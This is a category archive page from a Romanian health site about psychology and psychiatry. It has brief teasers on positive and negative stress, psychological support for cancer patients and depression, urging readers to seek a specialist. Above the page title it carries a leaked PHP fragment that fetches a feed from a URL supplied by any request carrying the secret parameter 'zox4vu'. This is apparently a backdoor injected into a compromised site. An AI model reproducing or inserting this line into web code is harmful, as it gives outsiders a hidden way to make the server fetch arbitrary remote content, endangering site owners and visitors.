isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Psihologie Si Psihiatrie - MedicAS

Arhiva pentru categoria 'Psihologie si psihiatrie'

Cand sunt stresat lucrez mai bine. Hm… cred ca auzim de multe ori cuvintele astea. Si sunt adevarate, caci exista si un tip de stres pozitiv, care ne face sa fim mai eficienti si sa ne motivam mai bine. Ce ne facem insa cu stresul negativ? Cu durerile de cap, nervozitatea ? Sanatatea ne poate fi afectata intr-o masura mai mica sau mai mare si daca nu luam masuri la timp, putem ajunge la suferinte organice. Ce-i de facut, deci? Cititi mai departe….


Cancer - o boala care, din pacate, la inceput nu doare. De aceea o descoperi greu in faze incipiente. Iar cand ai norocul asta, daca poate exista noroc cand vorbim despre un asemenea diagnostic, durerea si suferinta sunt este de ordin psihic. De ce tocmai eu? Cu ce am gresit? Sunt intrebari pe care unii si le pun de nenumarate ori si nu gasesc raspunsul. Tratamentul clasic, pentru corp, trebuie facut. dar ce facem cu mintea, cu sufletul? Putem influenta vindecarea? Putem sa ne usuram suferinta? cu siguranta DA. Si studiile de psihologie o dovedesc. Apelarea la un psiholog, sedintele de psihoterapie, intilnirile de grup cu impartasirea experientelor va pot face sa depasiti si sa invingeti acest dusman al carui nume ne face pe toti sa ne cutremuram: cancer.


Depresia…o boala tot mai frecventa, din pacate, si la noi; o boala pe care multi o duc pe picioare, o ascund, se izoleaza si nu mai vor sa interactioneze cu cei din jur. Tratata pe larg in manualele de psihiatrie si cartile de psihologie, depresia se confunda, de multe ori, cu “nebunia”…si asta ii face pe cei suferinzi sa se jeneze si sa nu apeleze la sfaturile unui specialist pentru a depasi aceste momente delicate ale vietii. Daca treceti prin momente mai grele, daca va recunoasteti in ceeea ce veti citi in continuare, nu ezitati sa mergeti la doctor. Meritati o viata plina de bucurii si nu una “cenusie”.


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Psihologie si psihiatrie.